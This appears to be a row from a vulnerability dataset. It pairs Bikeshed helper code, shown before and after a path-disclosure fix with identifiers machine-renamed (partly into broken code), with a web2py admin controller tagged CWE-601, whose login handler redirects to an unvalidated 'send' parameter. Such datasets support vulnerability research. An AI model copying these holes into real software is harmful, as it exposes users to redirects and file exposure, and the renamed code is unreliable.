chrootPath = os.path.abspath(chrootPath)
path = os.path.abspath(path)
if not path.startswith(chrootPath):
messages.die(f"Attempted to access a file ({path}) outside the source document's directory ({chrootPath}). See --allow-nonlocal-files.")
raise Exception()
else:
return path
def doEvery(s, action, lastTime=None):
# Takes an action every N seconds.
# Pass it the duration and the last time it took the action;
# it returns the time it last took the action
# (possibly just now).
# If you want to take action on first call,
# pass 0 as lastTime;
# otherwise it won't take action until N seconds.
import time
newTime = time.time()
if lastTime is None:
lastTime = newTime
if lastTime == 0 or newTime - lastTime > s:
action()
return newTime
return lastTime
| path_disclosure | {
"code": [
" return os.path.join(startPath, *pathSegs)"
],
"line_no": [
171
]
} | {
"code": [
"from .. import messages",
" path = os.path.join(startPath, *pathSegs)",
"def chrootPath(chrootPath, path):",
" path = os.path.abspath(path)",
" messages.die(f\"Attempted to access a file ({path}) outside the source document's directory ({chrootPath}). See --allow-nonlocal-files.\")",
" else:",
" return path"
],
"line_no": [
8,
174,
178,
180,
182,
184,
185
]
} | import collections
import os
import re
import lxml
def FUNC_0(VAR_0, VAR_1="or"):
VAR_0 = list(VAR_0)
if len(VAR_0) == 1:
return VAR_0[0]
if len(VAR_0) == 2:
return "{0} {2} {1}".format(VAR_0[0], VAR_0[1], VAR_1)
return "{0}, {2} {1}".format(", ".join(VAR_0[:-1]), VAR_0[-1], VAR_1)
def FUNC_1(VAR_2, VAR_3):
VAR_21 = iter(VAR_2)
yield next(VAR_21)
for x in VAR_21:
yield VAR_3
yield x
def FUNC_2(VAR_4, VAR_5, VAR_6):
for VAR_32, node in enumerate(VAR_4):
if VAR_32 % 2 == 0:
VAR_4[VAR_32 : i + 1] = FUNC_3(VAR_5, node, VAR_6)
return VAR_4
def FUNC_3(VAR_7, VAR_8, VAR_9=None):
VAR_22 = 0
VAR_23 = []
for match in VAR_7.finditer(VAR_8):
VAR_23.append(VAR_8[VAR_22 : match.start()])
if VAR_9:
VAR_23.append(VAR_9(match))
else:
VAR_23.append(match)
VAR_22 = match.end()
VAR_23.append(VAR_8[VAR_22:])
return VAR_23
def FUNC_4(VAR_10):
VAR_10 = VAR_10.strip().lower()
VAR_10 = re.sub(r"\(\)", "", VAR_10)
VAR_10 = re.sub(r"[\VAR_18/(,]+", "-", VAR_10)
VAR_10 = re.sub(r"[^a-z0-9_-]", "", VAR_10)
VAR_10 = VAR_10.rstrip("-")
return VAR_10
def FUNC_5(VAR_11):
from ..h import find, textContent
if VAR_11.get("data-lt") == "":
return []
elif VAR_11.get("data-lt"):
VAR_33 = VAR_11.get("data-lt")
if VAR_33 in ["|", "||", "|||"]:
VAR_24 = [VAR_33]
else:
VAR_24 = [x.strip() for x in VAR_33.split("|")]
else:
if VAR_11.tag in ("dfn", "a"):
VAR_24 = [textContent(VAR_11).strip()]
elif VAR_11.tag in ("h2", "h3", "h4", "h5", "h6"):
VAR_24 = [textContent(find(".content", VAR_11)).strip()]
if VAR_11.get("data-local-lt"):
VAR_31 = [x.strip() for x in VAR_11.get("data-local-lt").split("|")]
for VAR_10 in VAR_31:
if VAR_10 in VAR_24:
raise CLASS_0(VAR_10, VAR_24 + VAR_31, VAR_11)
VAR_24 += VAR_31
VAR_24 = [re.sub(r"\VAR_18+", " ", x) for x in VAR_24 if x != ""]
return VAR_24
class CLASS_0(Exception):
def __init__(self, VAR_25, VAR_26, VAR_11):
super().__init__()
self.offendingText = VAR_25
self.allTexts = VAR_26
self.el = VAR_11
def __unicode__(self):
return f"<Text '{self.offendingText}' shows up in both lt and local-lt>"
def FUNC_6(VAR_11):
try:
VAR_24 = FUNC_5(VAR_11)
except CLASS_0 as e:
VAR_24 = e.allTexts
return VAR_24[0] if len(VAR_24) > 0 else None
def FUNC_7(VAR_12):
if VAR_12 is None:
return None
VAR_12 = re.sub(r"\VAR_18+", " ", VAR_12)
return [
value.strip()
for value in re.split(r",(?![^()]*\))", VAR_12)
if value.strip()
]
def FUNC_8(VAR_13, VAR_14=2):
if VAR_13 in VAR_15:
return VAR_15[VAR_13]
VAR_27 = frozenset("abcdefghijklmnopqrstuvwxyz0123456789")
VAR_28 = ""
for char in VAR_13.lower():
if len(VAR_28) == VAR_14:
VAR_15[VAR_13] = VAR_28
return VAR_28
if char in VAR_27:
VAR_28 += char
else:
VAR_28 = group.ljust(VAR_14, "_")
VAR_15[VAR_13] = VAR_28
return VAR_28
VAR_15 = {}
def FUNC_9(VAR_16):
for VAR_11 in VAR_16:
if (
isinstance(VAR_11, collections.Iterable)
and not isinstance(VAR_11, str)
and not lxml.etree.iselement(VAR_11)
):
yield from FUNC_9(VAR_11)
else:
yield VAR_11
def FUNC_10(*VAR_17):
VAR_29 = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
return os.path.join(VAR_29, *VAR_17)
def FUNC_11(VAR_18, VAR_19, VAR_20=None):
import time
VAR_30 = time.time()
if VAR_20 is None:
VAR_20 = VAR_30
if VAR_20 == 0 or VAR_30 - VAR_20 > VAR_18:
VAR_19()
return VAR_30
return VAR_20
| import collections
import os
import re
import lxml
from .. import constants
from .. import messages
def FUNC_0(VAR_0, VAR_1="or"):
VAR_0 = list(VAR_0)
if len(VAR_0) == 1:
return VAR_0[0]
if len(VAR_0) == 2:
return "{0} {2} {1}".format(VAR_0[0], VAR_0[1], VAR_1)
return "{0}, {2} {1}".format(", ".join(VAR_0[:-1]), VAR_0[-1], VAR_1)
def FUNC_1(VAR_2, VAR_3):
VAR_23 = iter(VAR_2)
yield next(VAR_23)
for x in VAR_23:
yield VAR_3
yield x
def FUNC_2(VAR_4, VAR_5, VAR_6):
for VAR_34, node in enumerate(VAR_4):
if VAR_34 % 2 == 0:
VAR_4[VAR_34 : i + 1] = FUNC_3(VAR_5, node, VAR_6)
return VAR_4
def FUNC_3(VAR_7, VAR_8, VAR_9=None):
VAR_24 = 0
VAR_25 = []
for match in VAR_7.finditer(VAR_8):
VAR_25.append(VAR_8[VAR_24 : match.start()])
if VAR_9:
VAR_25.append(VAR_9(match))
else:
VAR_25.append(match)
VAR_24 = match.end()
VAR_25.append(VAR_8[VAR_24:])
return VAR_25
def FUNC_4(VAR_10):
VAR_10 = VAR_10.strip().lower()
VAR_10 = re.sub(r"\(\)", "", VAR_10)
VAR_10 = re.sub(r"[\VAR_20/(,]+", "-", VAR_10)
VAR_10 = re.sub(r"[^a-z0-9_-]", "", VAR_10)
VAR_10 = VAR_10.rstrip("-")
return VAR_10
def FUNC_5(VAR_11):
from ..h import find, textContent
if VAR_11.get("data-lt") == "":
return []
elif VAR_11.get("data-lt"):
VAR_35 = VAR_11.get("data-lt")
if VAR_35 in ["|", "||", "|||"]:
VAR_26 = [VAR_35]
else:
VAR_26 = [x.strip() for x in VAR_35.split("|")]
else:
if VAR_11.tag in ("dfn", "a"):
VAR_26 = [textContent(VAR_11).strip()]
elif VAR_11.tag in ("h2", "h3", "h4", "h5", "h6"):
VAR_26 = [textContent(find(".content", VAR_11)).strip()]
if VAR_11.get("data-local-lt"):
VAR_33 = [x.strip() for x in VAR_11.get("data-local-lt").split("|")]
for VAR_10 in VAR_33:
if VAR_10 in VAR_26:
raise CLASS_0(VAR_10, VAR_26 + VAR_33, VAR_11)
VAR_26 += VAR_33
VAR_26 = [re.sub(r"\VAR_20+", " ", x) for x in VAR_26 if x != ""]
return VAR_26
class CLASS_0(Exception):
def __init__(self, VAR_27, VAR_28, VAR_11):
super().__init__()
self.offendingText = VAR_27
self.allTexts = VAR_28
self.el = VAR_11
def __unicode__(self):
return f"<Text '{self.offendingText}' shows up in both lt and local-lt>"
def FUNC_6(VAR_11):
try:
VAR_26 = FUNC_5(VAR_11)
except CLASS_0 as e:
VAR_26 = e.allTexts
return VAR_26[0] if len(VAR_26) > 0 else None
def FUNC_7(VAR_12):
if VAR_12 is None:
return None
VAR_12 = re.sub(r"\VAR_20+", " ", VAR_12)
return [
value.strip()
for value in re.split(r",(?![^()]*\))", VAR_12)
if value.strip()
]
def FUNC_8(VAR_13, VAR_14=2):
if VAR_13 in VAR_15:
return VAR_15[VAR_13]
VAR_29 = frozenset("abcdefghijklmnopqrstuvwxyz0123456789")
VAR_30 = ""
for char in VAR_13.lower():
if len(VAR_30) == VAR_14:
VAR_15[VAR_13] = VAR_30
return VAR_30
if char in VAR_29:
VAR_30 += char
else:
VAR_30 = group.ljust(VAR_14, "_")
VAR_15[VAR_13] = VAR_30
return VAR_30
VAR_15 = {}
def FUNC_9(VAR_16):
for VAR_11 in VAR_16:
if (
isinstance(VAR_11, collections.Iterable)
and not isinstance(VAR_11, str)
and not lxml.etree.iselement(VAR_11)
):
yield from FUNC_9(VAR_11)
else:
yield VAR_11
def FUNC_10(*VAR_17):
VAR_31 = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
VAR_19 = os.path.join(VAR_31, *VAR_17)
return VAR_19
def VAR_18(FUNC_11, VAR_19):
VAR_18 = os.path.abspath(VAR_18)
VAR_19 = os.path.abspath(VAR_19)
if not VAR_19.startswith(VAR_18):
messages.die(f"Attempted to access a file ({VAR_19}) outside the source document's directory ({VAR_18}). See --allow-nonlocal-files.")
raise Exception()
else:
return VAR_19
def FUNC_12(VAR_20, VAR_21, VAR_22=None):
import time
VAR_32 = time.time()
if VAR_22 is None:
VAR_22 = VAR_32
if VAR_22 == 0 or VAR_32 - VAR_22 > VAR_20:
VAR_21()
return VAR_32
return VAR_22
| [
4,
6,
7,
9,
16,
17,
24,
25,
34,
38,
39,
58,
59,
61,
63,
64,
65,
71,
72,
75,
93,
96,
99,
100,
107,
110,
111,
118,
119,
134,
135,
152,
153,
155,
156,
167,
168,
172,
173,
175,
176,
177,
178,
179,
180,
181,
183,
191,
27,
28,
29,
30,
31,
32,
41,
42,
43,
44,
45,
46,
121,
122,
123,
124,
125,
137
] | [
4,
6,
9,
10,
12,
19,
20,
27,
28,
37,
41,
42,
61,
62,
64,
66,
67,
68,
74,
75,
78,
96,
99,
102,
103,
110,
113,
114,
121,
122,
137,
138,
155,
156,
158,
159,
170,
171,
176,
177,
186,
187,
188,
190,
191,
192,
193,
194,
195,
196,
198,
206,
30,
31,
32,
33,
34,
35,
44,
45,
46,
47,
48,
49,
124,
125,
126,
127,
128,
140
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Admin controller bootstrap: feature flags, imports, and access guards
# that run on every request before any action function is dispatched.
EXPERIMENTAL_STUFF = True
MAXNFILES = 1000
if EXPERIMENTAL_STUFF:
    if is_mobile:
        # serve the mobile variants of the admin views
        response.view = response.view.replace('default/', 'default.mobile/')
        response.menu = []
import re
from gluon.admin import *
from gluon.fileutils import abspath, read_file, write_file
from gluon.utils import web2py_uuid
from gluon.tools import Config
from gluon.compileapp import find_exposed_functions
from glob import glob
from gluon._compat import iteritems, PY2, pickle, xrange, urlopen, to_bytes, StringIO, to_native, reload
import gluon.rewrite
import shutil
import platform
try:
    import git
    if git.__version__ < '0.3.1':
        raise ImportError("Your version of git is %s. Upgrade to 0.3.1 or better." % git.__version__)
    have_git = True
except ImportError as e:
    # git support is optional; record why it is unavailable
    have_git = False
    GIT_MISSING = 'Requires gitpython module, but not installed or incompatible version: %s' % e
from gluon.languages import (read_possible_languages, read_dict, write_dict,
                             read_plural_dict, write_plural_dict)
# Guard: destructive/admin functions are disabled in demo mode.
if DEMO_MODE and request.function in ['change_password', 'pack',
        'pack_custom', 'pack_plugin', 'upgrade_web2py', 'uninstall',
        'cleanup', 'compile_app', 'remove_compiled_app', 'delete',
        'delete_plugin', 'create_file', 'upload_file', 'update_languages',
        'reload_routes', 'git_push', 'git_pull', 'install_plugin']:
    session.flash = T('disabled in demo mode')
    redirect(URL('site'))
# Guard: filesystem-writing functions are unavailable on Google App Engine.
if is_gae and request.function in ('edit', 'edit_language',
        'edit_plurals', 'update_languages', 'create_file', 'install_plugin'):
    session.flash = T('disabled in GAE mode')
    redirect(URL('site'))
# Guard: only managers may change the password or upgrade in multi-user mode.
if not is_manager() and request.function in ['change_password', 'upgrade_web2py']:
    session.flash = T('disabled in multi user mode')
    redirect(URL('site'))
if FILTER_APPS and request.args(0) and not request.args(0) in FILTER_APPS:
    session.flash = T('disabled in demo mode')
    redirect(URL('site'))
# Anti-CSRF token checked by design() when handling form posts.
if not session.token:
    session.token = web2py_uuid()
def count_lines(data):
    """Count the lines of *data* that are non-blank and not '#' comments.

    Note: the comment check looks at the raw (unstripped) line, so an
    indented '# ...' line still counts — this mirrors the original.
    """
    total = 0
    for raw in data.split('\n'):
        if raw.strip() and not raw.startswith('#'):
            total += 1
    return total
def log_progress(app, mode='EDIT', filename=None, progress=0):
    """Append an entry to *app*'s progress.log.

    Creates the log with a START marker on first use; when *filename* is
    given, records the mode, the file and the line-count delta *progress*.
    """
    progress_file = os.path.join(apath(app, r=request), 'progress.log')
    now = str(request.now)[:19]
    if not os.path.exists(progress_file):
        safe_open(progress_file, 'w').write('[%s] START\n' % now)
    if filename:
        safe_open(progress_file, 'a').write(
            '[%s] %s %s: %s\n' % (now, mode, filename, progress))
def safe_open(a, b):
    """Open file *a* with mode *b*.

    In demo or GAE mode, write/append opens return a no-op sink so the
    admin UI stays usable without touching the filesystem. Text opens on
    Python 3 are forced to UTF-8.
    """
    writing = 'w' in b or 'a' in b
    if (DEMO_MODE or is_gae) and writing:
        class _NullFile:
            def write(self, data):
                pass
            def close(self):
                pass
        return _NullFile()
    if PY2 or 'b' in b:
        return open(a, b)
    return open(a, b, encoding="utf8")
def safe_read(a, b='r'):
    """Read and return the full contents of file *a*, always closing it."""
    handle = safe_open(a, b)
    try:
        return handle.read()
    finally:
        handle.close()
def safe_write(a, value, b='w'):
    """Write *value* to file *a* (mode *b*), always closing the handle."""
    handle = safe_open(a, b)
    try:
        handle.write(value)
    finally:
        handle.close()
def get_app(name=None):
    """Return the requested app name if it exists and the user may see it.

    Falls back to request.args(0) when *name* is omitted. In multi-user
    mode, non-managers may only access apps they own. Redirects to the
    site page (never returns) on failure.
    """
    app = name or request.args(0)
    if (app and os.path.exists(apath(app, r=request)) and
        (not MULTI_USER_MODE or is_manager() or
         db(db.app.name == app)(db.app.owner == auth.user.id).count())):
        return app
    session.flash = T('App does not exist or you are not authorized')
    redirect(URL('site'))
def index():
    """ Index handler: admin login page, password check and lockout. """
    send = request.vars.send
    if DEMO_MODE:
        session.authorized = True
        session.last_time = t0
    if not send:
        send = URL('site')
    if session.authorized:
        redirect(send)
    elif failed_login_count() >= allowed_number_of_attempts:
        # lockout: stall the request, then refuse
        time.sleep(2 ** allowed_number_of_attempts)
        raise HTTP(403)
    elif request.vars.password:
        # cap password length to bound verify_password work
        if verify_password(request.vars.password[:1024]):
            session.authorized = True
            login_record(True)
            if CHECK_VERSION:
                session.check_version = True
            else:
                session.check_version = False
            session.last_time = t0
            if isinstance(send, list):  # ## why does this happen?
                send = str(send[0])
            redirect(send)
        else:
            times_denied = login_record(False)
            if times_denied >= allowed_number_of_attempts:
                response.flash = \
                    T('admin disabled because too many invalid login attempts')
            elif times_denied == allowed_number_of_attempts - 1:
                response.flash = \
                    T('You have one more login attempt before you are locked out')
            else:
                response.flash = T('invalid password.')
    return dict(send=send)
def check_version():
    """ Checks if web2py is up to date; returns a link/button/span widget. """
    session.forget()
    session._unlock(response)
    new_version, version = check_new_version(request.env.web2py_version,
                                             WEB2PY_VERSION_URL)
    if new_version in (-1, -2):
        # -1/-2: the remote version probe failed
        return A(T('Unable to check for upgrades'), _href=WEB2PY_URL)
    elif not new_version:
        return A(T('web2py is up to date'), _href=WEB2PY_URL)
    elif platform.system().lower() in ('windows', 'win32', 'win64') and os.path.exists("web2py.exe"):
        # the Windows binary distribution cannot self-upgrade in place
        return SPAN('You should upgrade to %s' % version.split('(')[0])
    else:
        return sp_button(URL('upgrade_web2py'), T('upgrade now to %s') % version.split('(')[0])
def logout():
    """ Logout handler: drop authorization and return to the login page. """
    session.authorized = None
    if MULTI_USER_MODE:
        redirect(URL('user/logout'))
    redirect(URL('index'))
def change_password():
    """Change the admin password (refused for PAM-authenticated users)."""
    if session.pam_user:
        session.flash = T(
            'PAM authenticated user, cannot change password here')
        redirect(URL('site'))
    form = SQLFORM.factory(Field('current_admin_password', 'password'),
                           Field('new_admin_password',
                                 'password', requires=IS_STRONG()),
                           Field('new_admin_password_again', 'password'),
                           _class="span4 well")
    if form.accepts(request.vars):
        if not verify_password(request.vars.current_admin_password):
            form.errors.current_admin_password = T('invalid password')
        elif form.vars.new_admin_password != form.vars.new_admin_password_again:
            form.errors.new_admin_password_again = T('no match')
        else:
            # the admin password lives in parameters_<port>.py as a CRYPT hash
            path = abspath('parameters_%s.py' % request.env.server_port)
            safe_write(path, 'password="%s"' % CRYPT()(
                request.vars.new_admin_password)[0])
            session.flash = T('password changed')
            redirect(URL('site'))
    return dict(form=form)
def site():
    """ Site handler: list installed apps, create new ones, install/clone. """
    myversion = request.env.web2py_version
    # Shortcut to make the elif statements more legible
    file_or_appurl = 'file' in request.vars or 'appurl' in request.vars
    class IS_VALID_APPNAME(object):
        # validator: name must be \w+ and must not clash unless overwrite is set
        def __call__(self, value):
            if not re.compile('^\w+$').match(value):
                return (value, T('Invalid application name'))
            if not request.vars.overwrite and \
                    os.path.exists(os.path.join(apath(r=request), value)):
                return (value, T('Application exists already'))
            return (value, None)
    is_appname = IS_VALID_APPNAME()
    form_create = SQLFORM.factory(Field('name', requires=is_appname),
                                  table_name='appcreate')
    form_update = SQLFORM.factory(Field('name', requires=is_appname),
                                  Field('file', 'upload', uploadfield=False),
                                  Field('url'),
                                  Field('overwrite', 'boolean'),
                                  table_name='appupdate')
    form_create.process()
    form_update.process()
    if DEMO_MODE:
        pass
    elif form_create.accepted:
        # create a new application
        appname = cleanpath(form_create.vars.name)
        created, error = app_create(appname, request, info=True)
        if created:
            if MULTI_USER_MODE:
                db.app.insert(name=appname, owner=auth.user.id)
            log_progress(appname)
            session.flash = T('new application "%s" created', appname)
            gluon.rewrite.load()
            redirect(URL('design', args=appname))
        else:
            session.flash = \
                DIV(T('unable to create application "%s"', appname),
                    PRE(error))
        redirect(URL(r=request))
    elif form_update.accepted:
        if (form_update.vars.url or '').endswith('.git'):
            # install by cloning a git repository
            if not have_git:
                session.flash = GIT_MISSING
                redirect(URL(r=request))
            target = os.path.join(apath(r=request), form_update.vars.name)
            try:
                new_repo = git.Repo.clone_from(form_update.vars.url, target)
                session.flash = T('new application "%s" imported',
                                  form_update.vars.name)
                gluon.rewrite.load()
            except git.GitCommandError as err:
                session.flash = T('Invalid git repository specified.')
            redirect(URL(r=request))
        elif form_update.vars.url:
            # fetch an application via URL or file upload
            try:
                f = urlopen(form_update.vars.url)
                if f.code == 404:
                    raise Exception("404 file not found")
            except Exception as e:
                session.flash = \
                    DIV(T('Unable to download app because:'), PRE(repr(e)))
                redirect(URL(r=request))
            fname = form_update.vars.url
        elif form_update.accepted and form_update.vars.file:
            fname = request.vars.file.filename
            f = request.vars.file.file
        else:
            session.flash = 'No file uploaded and no URL specified'
            redirect(URL(r=request))
        if f:
            appname = cleanpath(form_update.vars.name)
            installed = app_install(appname, f,
                                    request, fname,
                                    overwrite=form_update.vars.overwrite)
        if f and installed:
            msg = 'application %(appname)s installed with md5sum: %(digest)s'
            if MULTI_USER_MODE:
                db.app.insert(name=appname, owner=auth.user.id)
            log_progress(appname)
            session.flash = T(msg, dict(appname=appname,
                                        digest=md5_hash(installed)))
            gluon.rewrite.load()
        else:
            msg = 'unable to install application "%(appname)s"'
            session.flash = T(msg, dict(appname=form_update.vars.name))
        redirect(URL(r=request))
    regex = re.compile('^\w+$')
    if is_manager():
        apps = [a for a in os.listdir(apath(r=request)) if regex.match(a) and
                a != '__pycache__']
    else:
        # non-managers only see the apps they own
        apps = [a.name for a in db(db.app.owner == auth.user_id).select()]
    if FILTER_APPS:
        apps = [a for a in apps if a in FILTER_APPS]
    apps = sorted(apps, key=lambda a: a.upper())
    myplatform = platform.python_version()
    return dict(app=None, apps=apps, myversion=myversion, myplatform=myplatform,
                form_create=form_create, form_update=form_update)
def report_progress(app):
    """Parse *app*'s progress.log into [days_ago, cumulative_line_count] pairs.

    Returns an empty list when no log exists. days_ago is negative
    (days before now); the counter accumulates the per-entry deltas.
    """
    import datetime
    progress_file = os.path.join(apath(app, r=request), 'progress.log')
    regex = re.compile('\[(.*?)\][^\:]+\:\s+(\-?\d+)')
    if not os.path.exists(progress_file):
        return []
    # use a context manager: the original leaked the open file handle
    with open(progress_file, 'r') as log:
        matches = regex.findall(log.read())
    events, counter = [], 0
    for m in matches:
        if not m:
            continue
        days = -(request.now - datetime.datetime.strptime(m[0],
                                                          '%Y-%m-%d %H:%M:%S')).days
        counter += int(m[1])
        events.append([days, counter])
    return events
def pack():
    """Download the current app packed as .w2p (compiled variant when an
    extra URL arg is present)."""
    app = get_app()
    try:
        if len(request.args) == 1:
            fname = 'web2py.app.%s.w2p' % app
            filename = app_pack(app, request, raise_ex=True)
        else:
            fname = 'web2py.app.%s.compiled.w2p' % app
            filename = app_pack_compiled(app, request, raise_ex=True)
    except Exception as e:
        # keep the error for the flash message below (e is unbound after except)
        pferror = e
        filename = None
    if filename:
        response.headers['Content-Type'] = 'application/w2p'
        disposition = 'attachment; filename=%s' % fname
        response.headers['Content-Disposition'] = disposition
        return safe_read(filename, 'rb')
    else:
        session.flash = T('internal error: %s', pferror)
        redirect(URL('site'))
def pack_plugin():
    """Download one plugin of the current app packed as .w2p.

    Expects exactly two request args (app, plugin name).

    Bug fixed: when len(request.args) != 2 the original never bound
    `filename`, so `if filename:` raised NameError instead of flashing
    the internal-error message.
    """
    app = get_app()
    filename = None
    if len(request.args) == 2:
        fname = 'web2py.plugin.%s.w2p' % request.args[1]
        filename = plugin_pack(app, request.args[1], request)
    if filename:
        response.headers['Content-Type'] = 'application/w2p'
        disposition = 'attachment; filename=%s' % fname
        response.headers['Content-Disposition'] = disposition
        return safe_read(filename, 'rb')
    else:
        session.flash = T('internal error')
        redirect(URL('plugin', args=request.args))
def pack_exe(app, base, filenames=None):
    """Stream a Windows one-click bundle: the official web2py_win.zip with
    *app* (the given *filenames* under *base*) added and set as the
    default application.

    Cleanup: removed the unused `import urllib` (downloads go through
    gluon._compat.urlopen) and the unused `common_root` local.
    """
    import zipfile
    # Download latest web2py_win and open it with zipfile
    download_url = 'http://www.web2py.com/examples/static/web2py_win.zip'
    out = StringIO()
    out.write(urlopen(download_url).read())
    web2py_win = zipfile.ZipFile(out, mode='a')
    # Write routes.py with the application as default
    routes = u'# -*- coding: utf-8 -*-\nrouters = dict(BASE=dict(default_application="%s"))' % app
    web2py_win.writestr('web2py/routes.py', routes.encode('utf-8'))
    # Copy the application into the zipfile
    for filename in filenames:
        fname = os.path.join(base, filename)
        arcname = os.path.join('web2py/applications', app, filename)
        web2py_win.write(fname, arcname)
    web2py_win.close()
    response.headers['Content-Type'] = 'application/zip'
    response.headers['Content-Disposition'] = 'attachment; filename=web2py.app.%s.zip' % app
    out.seek(0)
    return response.stream(out)
def pack_custom():
    """Pack a user-selected subset of the app as .w2p, or delegate to
    pack_exe() for a Windows bundle.

    Bug fixed: the failure branch referenced `e` outside its `except`
    block; in Python 3 the exception variable is deleted when the block
    exits, so the error path itself raised NameError. The exception is
    now captured in `pack_error`.
    """
    app = get_app()
    base = apath(app, r=request)
    def ignore(fs):
        # drop hidden (#...), editor backup (~) and .bak entries
        return [f for f in fs if not (
            f[:1] in '#' or f.endswith('~') or f.endswith('.bak'))]
    files = {}
    for (r, d, f) in os.walk(base):
        files[r] = {'folders': ignore(d), 'files': ignore(f)}
    if request.post_vars.file:
        # only accept paths that actually exist under the app directory
        valid_set = set(os.path.relpath(os.path.join(r, f), base) for r in files for f in files[r]['files'])
        files = request.post_vars.file
        files = [files] if not isinstance(files, list) else files
        files = [file for file in files if file in valid_set]
        if request.post_vars.doexe is None:
            fname = 'web2py.app.%s.w2p' % app
            pack_error = None
            try:
                filename = app_pack(app, request, raise_ex=True, filenames=files)
            except Exception as e:
                pack_error = e
                filename = None
            if filename:
                response.headers['Content-Type'] = 'application/w2p'
                disposition = 'attachment; filename=%s' % fname
                response.headers['Content-Disposition'] = disposition
                return safe_read(filename, 'rb')
            else:
                session.flash = T('internal error: %s', pack_error)
                redirect(URL(args=request.args))
        else:
            return pack_exe(app, base, files)
    return locals()
def upgrade_web2py():
    """Upgrade the running web2py installation after user confirmation."""
    dialog = FORM.confirm(T('Upgrade'),
                          {T('Cancel'): URL('site')})
    if dialog.accepted:
        (success, error) = upgrade(request)
        if success:
            session.flash = T('web2py upgraded; please restart it')
        else:
            session.flash = T('unable to upgrade because "%s"', error)
        redirect(URL('site'))
    return dict(dialog=dialog)
def uninstall():
    """Uninstall an application after confirmation, packing it first so an
    accidental uninstall is recoverable."""
    app = get_app()
    dialog = FORM.confirm(T('Uninstall'),
                          {T('Cancel'): URL('site')})
    dialog['_id'] = 'confirm_form'
    dialog['_class'] = 'well'
    for component in dialog.components:
        component['_class'] = 'btn'
    if dialog.accepted:
        if MULTI_USER_MODE:
            # managers may remove any app; owners only their own
            if is_manager() and db(db.app.name == app).delete():
                pass
            elif db(db.app.name == app)(db.app.owner == auth.user.id).delete():
                pass
            else:
                session.flash = T('no permission to uninstall "%s"', app)
                redirect(URL('site'))
        try:
            # pack a backup copy before removing anything
            filename = app_pack(app, request, raise_ex=True)
        except:
            session.flash = T('unable to uninstall "%s"', app)
        else:
            if app_uninstall(app, request):
                session.flash = T('application "%s" uninstalled', app)
            else:
                session.flash = T('unable to uninstall "%s"', app)
        redirect(URL('site'))
    return dict(app=app, dialog=dialog)
def cleanup():
    """Clear the app's cache, error tickets and sessions, then redirect."""
    app = get_app()
    clean = app_cleanup(app, request)
    if not clean:
        session.flash = T("some files could not be removed")
    else:
        session.flash = T('cache, errors and sessions cleaned')
    redirect(URL('site'))
def compile_app():
    """Byte-compile the app; optionally skip (and report) failing views."""
    app = get_app()
    c = app_compile(app, request,
                    skip_failed_views=(request.args(1) == 'skip_failed_views'))
    if not c:
        session.flash = T('application compiled')
    elif isinstance(c, list):
        # compiled, but some views were skipped: list them in the flash
        session.flash = DIV(*[T('application compiled'), BR(), BR(),
                              T('WARNING: The following views could not be compiled:'), BR()] +
                            [CAT(BR(), view) for view in c] +
                            [BR(), BR(), T('DO NOT use the "Pack compiled" feature.')])
    else:
        session.flash = DIV(T('Cannot compile: there are errors in your app:'),
                            CODE(c))
    redirect(URL('site'))
def remove_compiled_app():
    """ Remove the compiled application (deletes its compiled/ artifacts). """
    app = get_app()
    remove_compiled_application(apath(app, r=request))
    session.flash = T('compiled application removed')
    redirect(URL('site'))
def delete():
    """ Object delete handler: confirm, then remove a file from the app.

    Logs the (negative) line count of the removed file to progress.log.

    Cleanup: the original leaked the file handle used to count lines;
    it is now closed via a context manager.
    """
    app = get_app()
    filename = '/'.join(request.args)
    sender = request.vars.sender
    if isinstance(sender, list):  # ## fix a problem with Vista
        sender = sender[0]
    dialog = FORM.confirm(T('Delete'),
                          {T('Cancel'): URL(sender, anchor=request.vars.id)})
    if dialog.accepted:
        try:
            full_path = apath(filename, r=request)
            with open(full_path, 'r') as fh:
                lineno = count_lines(fh.read())
            os.unlink(full_path)
            log_progress(app, 'DELETE', filename, progress=-lineno)
            session.flash = T('file "%(filename)s" deleted',
                              dict(filename=filename))
        except Exception:
            session.flash = T('unable to delete file "%(filename)s"',
                              dict(filename=filename))
        redirect(URL(sender, anchor=request.vars.id2))
    return dict(dialog=dialog, filename=filename)
def enable():
    """Toggle the app's DISABLED marker file; requires a signed URL."""
    if not URL.verify(request, hmac_key=session.hmac_key): raise HTTP(401)
    app = get_app()
    filename = os.path.join(apath(app, r=request), 'DISABLED')
    if is_gae:
        return SPAN(T('Not supported'), _style='color:yellow')
    elif os.path.exists(filename):
        # currently disabled -> enable it
        os.unlink(filename)
        return SPAN(T('Disable'), _style='color:green')
    else:
        if PY2:
            safe_open(filename, 'wb').write('disabled: True\ntime-disabled: %s' % request.now)
        else:
            str_ = 'disabled: True\ntime-disabled: %s' % request.now
            safe_open(filename, 'wb').write(str_.encode('utf-8'))
        return SPAN(T('Enable'), _style='color:red')
def peek():
    """ Visualize object code: return a file's contents for display. """
    app = get_app(request.vars.app)
    filename = '/'.join(request.args)
    if request.vars.app:
        path = abspath(filename)
    else:
        path = apath(filename, r=request)
    try:
        # normalize line endings for display
        data = safe_read(path).replace('\r', '')
    except IOError:
        session.flash = T('file does not exist')
        redirect(URL('site'))
    extension = filename[filename.rfind('.') + 1:].lower()
    return dict(app=app,
                filename=filename,
                data=data,
                extension=extension)
def test():
    """ Execute controller tests: list controllers matching the arg regex. """
    app = get_app()
    if len(request.args) > 1:
        file = request.args[1]
    else:
        file = '.*\.py'
    controllers = listdir(
        apath('%s/controllers/' % app, r=request), file + '$')
    return dict(app=app, controllers=controllers)
def keepalive():
    """Ajax keepalive endpoint; responds with an empty body."""
    return ''
def search():
    """Find app files (*.py, *.html) whose content contains the keywords."""
    keywords = request.vars.keywords or ''
    app = get_app()
    def match(filename, keywords):
        # plain substring search over the whole file
        filename = os.path.join(apath(app, r=request), filename)
        if keywords in read_file(filename, 'r'):
            return True
        return False
    path = apath(request.args[0], r=request)
    files1 = glob(os.path.join(path, '*/*.py'))
    files2 = glob(os.path.join(path, '*/*.html'))
    files3 = glob(os.path.join(path, '*/*/*.html'))
    files = [x[len(path) + 1:].replace(
        '\\', '/') for x in files1 + files2 + files3 if match(x, keywords)]
    return response.json(dict(files=files, message=T.M('Searching: **%s** %%{file}', len(files))))
def edit():
    """ File edit handler: the ajax code editor (load, save, revert,
    conflict detection, editor preferences, view/controller cross-links). """
    # Load json only if it is ajax edited...
    app = get_app(request.vars.app)
    app_path = apath(app, r=request)
